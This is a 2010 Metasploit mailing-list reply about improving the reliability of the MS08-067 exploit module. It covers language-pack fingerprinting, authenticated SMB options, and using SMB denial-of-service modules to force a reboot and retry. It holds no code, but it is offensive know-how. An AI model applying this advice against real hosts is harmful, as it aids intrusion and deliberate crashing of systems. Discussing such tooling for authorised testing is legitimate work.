Re: Unreliable exploitation with ms08_067_netapi ?

[HD Moore <hdm () metasploit com>]

On 6/3/2010 11:09 AM, Richard Miles wrote:
> Thanks, very informative.
>
> > Not really. The only way we can reliably detect the remote language pack
> > is using the printer driver technique published by Immunity.
>
> Can you please point me to this paper?

http://www.immunitysec.com/downloads/MacroReliability.odp

Slide 21 (and 19 for the share name, but printers turned out to work better)

> > On operating systems that do not allow the print drivers to be enumerated
> > without authentication, it is not possible to identify the language
> > pack. If you can figure out the language pack on your own, you can set
> > it, but thats why we have 50+ targets.
>
> There is a way to use the metasploit smb scanner with a credential to
> identify it? I mean, sometimes we have a restricted account
> credential, if a restricted/normal user credential allows to enumerate
> it, there is a new light on the dark, not?

You can set SMBUser/SMBPass in the exploit and it should be able to
fingerprint the language properly.


> Appear that restart the server service and browser service service is
> not enough to give another shot too. Do you know other if there is
> another trick instead of reboot?

Restarting doesn't work because the services end up in different
processes. You can, however set SMBPIPE to "SRVSVC", but this might
require authentication if simple file sharing is not enabled on a newer
version of Windows.

> I also was thinking, this exploit do not restart the machine if the
> exploitation fail, if the box is vulnerable it's very probable the
> target also will be SMBv2 DoS, which could help us to force a reboot
> to give another try. There is such a exploit at Metasploit?

There are a number of SMB DoS bugs under auxiliary/dos/windows/smb/,
including some for SMBv2 flaws.


> Hummm, interesting.See this description
>
> http://forums.remote-exploit.org/backtrack3-howtos/18556-playing-ms08_067-a-4.html

It would be odd to have an AV product new enough to catch this as but
installed on a system unpatched against a vuln from 2008.


> Maybe add target of 2003 SP2 with all patches less one up to the one
> that fix ms08-67? Or it could be useless in real world?

I tried at one point and couldn't find any working combinations of
opcodes. This is kind of pointless in the real world, as you would need
to know exactly the right patch level to choose the correct target.


> Humm... for this kind of exploit is impossible to brute force this
> address values, like in old overflows where ret brute force was
> possible? I mean, if used together with a SMBv2 DOS exploit it could
> work, not? Or exploitation is too different on recent days?

Too different. The SP2 targets use 5 different hardcoded addresses; you
can try building targets for as many combinations as possible, then
cycling the targets, but each target will take a few hours to get right.

-HD
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework